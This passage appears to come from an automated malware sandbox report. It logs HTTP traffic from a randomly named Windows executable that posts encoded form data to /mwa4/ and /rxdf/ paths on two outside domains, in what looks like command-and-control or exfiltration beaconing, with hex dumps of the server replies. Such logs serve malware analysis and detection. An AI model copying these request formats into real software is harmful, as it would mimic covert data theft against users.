                                                      Jul 3, 2024 17:58:30.652988911 CEST1236INData Raw: bc 07 c1 24 6f b9 b3 88 0c e0 a6 93 44 2b 04 3d 38 7a 14 1e 65 ae 8c a7 5b 75 fa 85 9f 8a 3b 87 a3 5e 2f 37 24 9b ad 29 05 66 96 b1 a4 98 3f 53 d1 c2 36 24 e3 48 3b ee c6 53 61 7b 33 30 5d 6b cb 0b ad 61 67 39 70 7c 68 e3 f1 6f 3f da 23 b5 84 1a
                                                      Data Ascii: $oD+=8ze[u;^/7$)f?S6$H;Sa{30]kag9p|ho?#8#j$FMN=`>ufV5[v8E<9+&7lcK0`?Tf*Zh_8_q(Lkb`.S^]0vDdGe+T}q:wD$}xz~!Z7
                                                      Jul 3, 2024 17:58:30.653523922 CEST448INData Raw: 31 11 b9 ab 5f 1b c8 57 41 80 c9 94 e0 0c 86 af a3 13 e4 4f b1 92 41 c5 38 c9 56 b2 aa 92 d2 71 ec 18 59 66 2b a5 d2 70 e3 0d 16 81 73 bd f7 e5 18 ae f7 26 af 8b bd d3 13 7f d1 85 cb fa de 7b 75 bb 37 4b 97 e4 72 1e 8e fe 46 c2 26 a2 85 62 02 29
                                                      Data Ascii: 1_WAOA8VqYf+ps&{u7KrF&b)uD+7:2Efcn@iUNk&&U-+=m[dk13@U1}[/7:V\^])-Est#/-Lgx&cpp
                                                      Jul 3, 2024 17:58:30.657411098 CEST1236INData Raw: 3b 72 a2 7c 7b aa f6 50 9c a1 0f 51 1b 4f e4 b2 d6 4b be e1 da 3d 4c c6 c9 79 72 62 63 52 70 aa 25 2e e3 82 32 e6 0a 38 3e 80 0b 2e d4 3a 3a dc 4a ee 49 28 30 99 55 26 03 41 6b 86 2a 89 91 0f b8 3b d3 0b b3 be d2 c4 b5 16 d4 9e 38 0c 82 3a 25 e1
                                                      Data Ascii: ;r|{PQOK=LyrbcRp%.28>.::JI(0U&Ak*;8:%3NGWC .x>/V%ZZ|=ZOCKRE8>:P=3loo%=7>M_EnO(k'dbF*<nI/T?bYj7J=6I+


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.649760144.208.124.10806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:32.778522968 CEST1669OUTPOST /mwa4/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      Origin: http://www.superunicornpalace.com
                                                      Referer: http://www.superunicornpalace.com/mwa4/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4d 49 46 49 4b 70 6e 6e 72 79 5a 51 34 6f 35 78 6d 58 4c 50 66 39 37 6e 6f 72 75 79 58 71 65 63 36 56 4a 30 74 66 61 39 44 66 50 34 30 65 59 73 39 70 48 4b 31 6a 2b 35 67 4c 68 6d 45 72 63 55 32 73 77 35 71 37 79 68 57 70 46 41 68 68 53 65 6a 4e 6e 67 49 4b 43 6f 47 69 45 66 43 2f 2b 78 57 4c 54 2f 6f 38 58 52 57 4e 6f 6c 35 37 53 41 71 59 77 2f 53 6a 49 53 30 7a 4b 77 49 46 38 62 37 34 6f 2f 48 63 4b 77 4a 58 5a 63 46 68 71 59 7a 48 6f 74 77 79 63 4e 45 68 57 73 4e 43 70 6f 48 31 56 33 4c 56 33 50 58 44 32 4b 59 75 7a 69 76 31 62 71 4b 72 58 6b 48 6b 62 64 7a 2f 54 52 34 32 46 66 54 74 7a 6c 39 54 4f 31 33 41 64 30 71 54 62 4c 33 79 48 66 49 62 4a 4c 61 62 57 65 52 37 78 61 43 47 31 45 67 4a 41 6c 4d 72 44 39 56 38 37 44 78 55 39 65 61 32 62 71 78 68 57 48 49 66 46 61 6d 45 62 49 76 4e 4e 4d 45 69 47 57 49 37 30 6a 34 44 35 57 44 4b 62 76 47 32 71 6f 6d 4d 79 32 2b 44 30 42 45 58 4f 74 33 30 43 75 67 33 31 53 5a 30 35 52 79 6a 4e 42 74 55 44 6c 73 6c 34 68 77 4e 32 4e 64 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=MIFIKpnnryZQ4o5xmXLPf97noruyXqec6VJ0tfa9DfP40eYs9pHK1j+5gLhmErcU2sw5q7yhWpFAhhSejNngIKCoGiEfC/+xWLT/o8XRWNol57SAqYw/SjIS0zKwIF8b74o/HcKwJXZcFhqYzHotwycNEhWsNCpoH1V3LV3PXD2KYuziv1bqKrXkHkbdz/TR42FfTtzl9TO13Ad0qTbL3yHfIbJLabWeR7xaCG1EgJAlMrD9V87DxU9ea2bqxhWHIfFamEbIvNNMEiGWI70j4D5WDKbvG2qomMy2+D0BEXOt30Cug31SZ05RyjNBtUDlsl4hwN2NdkeLtPMAoC8mrxFaD4fmE6h99zWixvGfRhE7nkHhzXatu4twf5UrW3Kr/NPO4dJIbT4Gj4OiJkizd6qUpQ36xxyXwzas2nnIkweOSK7PdNbA8Y+WIpb+6mtB1Gu8YXwGL1y7/CKiFDaYTMOshS1lazbAJTbcbDW+1qDABf6T0fDK4UoBNYNdz66w+wFL8T/9Nmf9DZK/X+Ds0cKTiHeUXfw7Dj+210mAOE3TJEhLXmReFIkGxAdVKXTuV4Rx9ffTxuC5n9vndVjFZf8b0+vG4+u1fn5MD+NO5NegmMjxQPQu171AsTe25d6Of2qt6YNPux1U6IRco+okRvUQes4PgIrUKRbOantJ0b7AdDAuRq1c2jQABVFIIAzbALMAQa6L21UxBzegVciiauRLCtOEH0JV1qc/2wliEzbRKYK6hBVU8x8+4Rsui368OTS5i++vLsEJ1RXgHec3WtZGXbiazHGZyOy6n5oSchTg2r6B9K5NHKMUtieHCyCbPM90hvkFynCfN3mTY54/+msdG7VSKIWTh4v9VmJU4b2wcvOSUjYRkCA8yiEn48ofBsBfjZt2y7nu46AqB4bkGXw/4Hpt+kA1K7DGxqPW01jG0CQ09WIgIaohncqGYh+fm9EqXywrLn0Qivb/xX8LKdLnAVY9mLmAa63b4PTNrjp [TRUNCATED]
                                                      Jul 3, 2024 17:58:33.498534918 CEST1236INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                      x-tec-api-version: v1
                                                      x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                      x-tec-api-origin: https://superunicornpalace.com
                                                      transfer-encoding: chunked
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      date: Wed, 03 Jul 2024 15:58:33 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 66 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 6b 8f db b8 92 fd 3c 0d ec 7f 60 ab 71 dd d2 84 92 25 f9 d9 72 94 c1 dc 24 73 71 17 33 9b c1 24 c1 62 91 0e 02 5a 2a d9 4c f4 1a 92 6a bb d7 e3 ff be 20 25 d9 b2 5b 7e a4 3d 9b 4e 3a 16 55 75 4e b1 58 2c b2 48 bf bc 7e f3 ee f5 87 ff f9 fd 2d 9a 8b 24 7e f5 1f 57 2f e5 ff 28 26 e9 cc d7 20 35 3f be d7 50 10 13 ce 7d 2d 48 78 42 b8 00 c6 bf 48 19 4d 09 03 09 e5 ff 09 08 82 82 39 61 1c 84 af 7d fc f0 8b 39 d6 50 77 f3 26 25 09 f8 da 03 85 45 9e 31 a1 a1 20 4b 05 a4 c2 d7 16 34 14 73 3f 84 07 1a 80 a9 1e 30 a2 29 15 94 c4 26 0f 48 0c be 83 51 42 96 34 29 92 ba e1 29 70 94 b1 84 08 33 04 01 81 a0 59 da 20 10 10 43 3e cf 52 f0 d3 ac 52 8c 69 fa 0d 31 88 7d 2d 67 59 44 63 d0 d0 9c 41 e4 6b dd ee 2c c9 67 56 c6 66 dd 65 94 76 1d e7 a9 02 4d 67 53 12 7c ab 35 e6 42 e4 5e b7 cb 8b 1c 58 91 d2 20 63 69 4e 62 12 80 15 64 49 77 99 c4 2c 0f ac 7c 9e 57 40 82 8a 18 5e fd 4e 66 80 d2 4c a0 28 2b d2 10 75 6e c6 ae e3 4c d0 c7 52 1f fd ae 00 5e 76 4b e1 ca b5 ca 81 [TRUNCATED]
                                                      Data Ascii: f81Zk<`q%r$sq3$bZ*Lj %[~=N:UuNX,H~-$~W/(& 5?P}-HxBHM9a}9Pw&%E1 K4s?0)&HQB4))p3Y C>RRi1}-gYDcAk,gVfevMgS|5B^X ciNbdIw,|W@^NfL(+unLR^vK,fnwI23g u_]6L@>O7RYb 9{xH4 r$u&l~@nou$=N<,EW{v'5xw}W/yh.qQ_)[WWOOa,rH=AG>ZiS#5O{.rwUpn1*3lw{Ky3ka<<0Sha0+X,PfT"7iEl2pZ_O5z=x>)G2
                                                      Jul 3, 2024 17:58:33.498780966 CEST1236INData Raw: 11 29 44 66 ce 20 05 46 04 84 d2 a1 d7 51 91 aa 54 a5 53 9c 1a ab 07 c2 50 86 39 86 49 dd 8e 02 1d 8c 95 60 8f ea 9d f0 57 bc c8 65 ee fc 00 5c 70 0f b0 a0 09 70 41 92 dc d3 53 58 a0 37 44 80 61 3d 90 b8 80 77 91 6e ac 27 1c 38 a7 59 fa 5e 64 8c
                                                      Data Ascii: )Df FQTSP9I`We\ppASX7Da=wn'8Y^d - 3F0u@D0t>iXAmlc>nz8:8Klc_Zy]o @[!/)U6c@,E`z@>cU'yml\*/
                                                      Jul 3, 2024 17:58:33.498792887 CEST448INData Raw: e6 71 31 a3 29 ef fe 2a 71 de 2b 9c 2e e1 1c 04 ef 72 41 04 0d ba 0d 86 6e c0 79 f3 d9 0a 78 59 30 8c ac 3b 6b 78 5b d6 60 b7 6a f6 2a 5b 12 08 29 f1 6f 49 1c 97 05 b5 32 5e 99 bd c8 cd b2 fa 28 fb 63 d2 54 ae c2 65 0f 54 85 bd 45 79 75 75 f5 03
                                                      Data Ascii: q1)*q+.rAnyxY0;kx[`j*[)oI2^(cTeTEyuuMf"7yBcxH>*u<&*A5MdyAR1iB`JZ|Nl,<@a3zFe=t5ILgLz.gVrrFQk/28"7q|3c:e=~Wr*UY*$'.
                                                      Jul 3, 2024 17:58:33.498905897 CEST1236INData Raw: 8e 4c 2b 64 4e 62 30 73 9a 4a ea 68 34 0e c9 a8 5d ee 81 3e d0 d0 64 10 7a e8 26 88 5c 70 a1 5d 2e 2e 12 9a 66 05 37 4b 85 8c 91 74 56 da 30 bc b3 ed b3 74 88 dc 56 4a 73 82 e9 61 15 79 ac 60 ce 64 5d 63 4a af 78 e8 66 34 0d 83 e9 a0 9d a1 34 66
                                                      Data Ascii: L+dNb0sJh4]>dz&\p]..f7KtV0tVJsay`d]cJxf44fGC{oWN-CDApw=80&t^<wbt<t3vR=80TC79?r Dv<tC5RaV)v\BiNoCGuG1;;
                                                      Jul 3, 2024 17:58:33.498915911 CEST350INData Raw: dc f6 0c e4 67 e4 b4 67 b0 ec a5 94 72 ff d5 12 99 7b 72 55 2e bb 9c f0 fc 1c f6 1c ae e7 e4 ae 67 f0 3c 23 67 3d 83 e5 fb 73 d5 33 48 be 37 47 3d 9b e2 60 6e da b3 60 7b 42 5d a5 c5 fa 8e a0 91 8a 1b fb a9 b6 ec b2 d1 38 75 0f d1 16 f7 7b 21 b4
                                                      Data Ascii: ggr{rU.g<#g=s3H7G=`n`{B]8u{!5g\[<Pk#hk4..3{N[rwbu~U~"p9[j^^"&5E4[xvZ+Xj|ue`nVOm|jh+oX* +g*
                                                      Jul 3, 2024 17:58:33.498929977 CEST1236INData Raw: 31 63 30 39 0d 0a cc 3d fd 6f db 46 b2 3f 3b 40 fe 87 05 8d be 97 f4 44 5b f2 47 ec a3 d2 dc 6b 93 2b 5e 81 bb 5e de 6b 0b 3c a0 0a 04 4a a4 6d d6 34 57 20 29 3b ae a0 ff fd 61 66 f6 63 96 5c 52 74 a2 a6 d7 00 77 32 b9 9c 9d 9d 9d 9d 9d af 9d 65
                                                      Data Ascii: 1c09=oF?;@D[Gk+^^k<Jm4W );afc\Rtw2e(&BaC8^<):vR[lx~tyt;le9f:UM%h#mUua+SaYwUw,oYa?O~)Y_~gx!-wY"yVi)ry-0
                                                      Jul 3, 2024 17:58:33.498939991 CEST1236INData Raw: 58 bb c9 0d da 43 1c cb bb c8 4e 35 fb 30 a2 e4 a0 7b 8c 4b bf 59 d3 0f bc db 7f bb 8a ef b2 fc f1 9b 6f 8b 3a 5b fe e5 5d 96 c8 22 fd 8f c3 f1 e9 e5 d4 94 3d eb 74 da 9b 2a 06 3b e5 f0 f5 ba 4e 8b 45 5a 5e 87 57 25 56 87 4c e8 98 f5 1e 78 c2 80
                                                      Data Ascii: XCN50{KYo:[]"=t*;NEZ^W%VLx>n{%iHu6VdapVF6K<~JUa.cOA(D2_>UvFlXOfdT"tY(<[WYDsj^2K u
                                                      Jul 3, 2024 17:58:33.498950005 CEST1236INData Raw: 3d 7c bc bf 7e 70 47 73 93 25 e9 5e 46 03 80 d4 60 bb 47 93 a7 55 a5 47 03 bf 3d a3 69 c2 79 d2 68 b4 ba 33 27 ad 66 8e 1c e8 cc d3 af c0 d5 9b 0d 11 68 bb d5 a6 f2 23 35 fd 20 f0 bd d5 02 e7 9b 8d 81 09 36 f3 76 3b 47 c5 f2 83 e1 b6 27 e1 a7 02
                                                      Data Ascii: =|~pGs%^F`GUG=iyh3'fh#5 6v;G'dc'YqG5krN{ue,<,,Z-gxof}o^z@c.]fx ,3SZ5\\8g7gIvoL:)EwWP/&ZJv<{
                                                      Jul 3, 2024 17:58:33.499552011 CEST1236INData Raw: fa 91 a3 35 68 35 92 89 db e6 dd 06 02 d3 6a 81 f3 db a3 69 23 dc d2 2c d9 f0 f8 d8 a3 2b b9 c4 9b 00 aa 6c 91 a7 bb 29 e1 6b df c3 d3 48 43 e6 5e ab 0b 1f 80 26 53 37 59 7d e1 ff 8c f5 ab 8e 54 60 77 a0 2a a3 85 e9 eb 8a ee ec 13 78 08 90 4e 4f
                                                      Data Ascii: 5h5ji#,+l)kHC^&S7Y}T`w*xNO}Xr|}r%ef6-7mw`(=C,](&jN<fg0A05Pucp@a0zf+OlLX(l,v6_A.#Lk8>>auQ
                                                      Jul 3, 2024 17:58:33.499563932 CEST896INData Raw: 4f 32 46 9b 04 9b 66 da 84 0e 73 c3 16 aa f4 1a fb 2d dc 11 d5 c4 cc bf 09 b5 9c 19 8d fd c6 b7 49 91 7c b1 bd 71 69 68 9f 36 55 55 d4 65 fa 97 95 d6 66 da db cc ce 0d 00 01 eb d0 0e ee 55 c6 e6 72 57 5c 8b 8e 43 fc 0c 9f b4 50 1c b2 e4 0f f1 63
                                                      Data Ascii: O2Ffs-I|qih6UUefUrW\CPcx|96Q9+xmD[v>pUk}pG&/e%'&J[iR*^6]7W})v\XtlZV 5n0~)x)iobzANVhH/3c:;vh721}R
                                                      Jul 3, 2024 17:58:33.500623941 CEST1236INData Raw: 3b 72 a2 7c 7b aa f6 50 9c a1 0f 51 1b 4f e4 b2 d6 4b be e1 da 3d 4c c6 c9 79 72 62 63 52 70 aa 25 2e e3 82 32 e6 0a 38 3e 80 0b 2e d4 3a 3a dc 4a ee 49 28 30 99 55 26 03 41 6b 86 2a 89 91 0f b8 3b d3 0b b3 be d2 c4 b5 16 d4 9e 38 0c 82 3a 25 e1
                                                      Data Ascii: ;r|{PQOK=LyrbcRp%.28>.::JI(0U&Ak*;8:%3NGWC .x>/V%ZZ|=ZOCKRE8>:P=3loo%=7>M_EnO(k'dbF*<nI/T?bYj7J=6I+


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.649761144.208.124.10806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:36.297931910 CEST355OUTGET /mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:36.852780104 CEST492INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      x-redirect-by: WordPress
                                                      location: http://superunicornpalace.com/mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs=
                                                      content-length: 0
                                                      date: Wed, 03 Jul 2024 15:58:36 GMT
                                                      server: LiteSpeed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.649762162.43.101.114806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:42.887034893 CEST599OUTPOST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 32 46 42 68 45 62 49 4e 72 36 35 61 72 53 6c 76 35 51 67 68 48 79 68 49 59 68 4a 4e 38 4f 35 74 6d 6b 65 6e 54 39 77 47 4f 30 58 30 33 64 6f 73 64 6f 59 32 5a 73 30 58 78 67 69 72 32 33 67 71 37 48 64 79 53 37 45 72 4d 54 38 54 39 4b 56 53 38 71 6d 56 50 2b 34 7a 6d 31 79 4b 78 2f 65 6c 62 41 34 72 62 32 32 31 4b 36 35 31 49 4b 72 63 57 58 66 33 31 2b 67 59 39 54 72 57 59 38 34 78 4e 33 58 68 38 44 4d 4b 6c 48 72 69 33 69 50 6b 58 68 69 64 37 49 6a 79 76 43 4a 52 71 51 4a 58 44 48 74 63 4b 71 4c 7a 70 77 72 48 46 36 50 48 61 4e 46 65 41 4c 48 4b 69 6e 6e 73 49 39 64 35
                                                      Data Ascii: OdjTHtuX=q7B8n2BUJ3HP2FBhEbINr65arSlv5QghHyhIYhJN8O5tmkenT9wGO0X03dosdoY2Zs0Xxgir23gq7HdyS7ErMT8T9KVS8qmVP+4zm1yKx/elbA4rb221K651IKrcWXf31+gY9TrWY84xN3Xh8DMKlHri3iPkXhid7IjyvCJRqQJXDHtcKqLzpwrHF6PHaNFeALHKinnsI9d5
                                                      Jul 3, 2024 17:58:43.897125006 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:23 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                      Jul 3, 2024 17:58:43.897142887 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                      Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.649763162.43.101.114806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:45.426419973 CEST623OUTPOST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 33 6d 4a 68 47 34 77 4e 74 61 35 56 31 43 6c 76 75 41 67 39 48 79 39 49 59 6c 35 64 38 61 56 74 6e 41 61 6e 53 34 4d 47 43 55 58 30 76 4e 6f 74 51 49 5a 34 5a 73 49 78 78 68 65 72 32 33 30 71 37 44 52 79 52 4a 73 6f 4e 44 38 72 32 71 56 4d 34 71 6d 56 50 2b 34 7a 6d 31 4f 6b 78 2f 47 6c 62 77 49 72 61 55 65 79 48 61 35 32 59 61 72 63 63 33 66 7a 31 2b 67 6d 39 52 66 6f 59 2b 77 78 4e 31 2f 68 38 58 5a 63 76 48 72 67 35 43 4f 55 58 42 2f 55 35 49 65 67 75 53 6c 67 7a 43 39 44 50 52 73 47 57 5a 4c 51 37 67 4c 46 46 34 58 31 61 74 46 30 43 4c 2f 4b 77 77 72 4c 48 4a 34 61 76 72 7a 4e 56 4d 32 69 6e 32 46 35 6a 53 30 39 69 4e 59 6a 70 77 3d 3d
                                                      Data Ascii: OdjTHtuX=q7B8n2BUJ3HP3mJhG4wNta5V1ClvuAg9Hy9IYl5d8aVtnAanS4MGCUX0vNotQIZ4ZsIxxher230q7DRyRJsoND8r2qVM4qmVP+4zm1Okx/GlbwIraUeyHa52Yarcc3fz1+gm9RfoY+wxN1/h8XZcvHrg5COUXB/U5IeguSlgzC9DPRsGWZLQ7gLFF4X1atF0CL/KwwrLHJ4avrzNVM2in2F5jS09iNYjpw==
                                                      Jul 3, 2024 17:58:46.255147934 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:26 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                      Jul 3, 2024 17:58:46.255343914 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                      Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


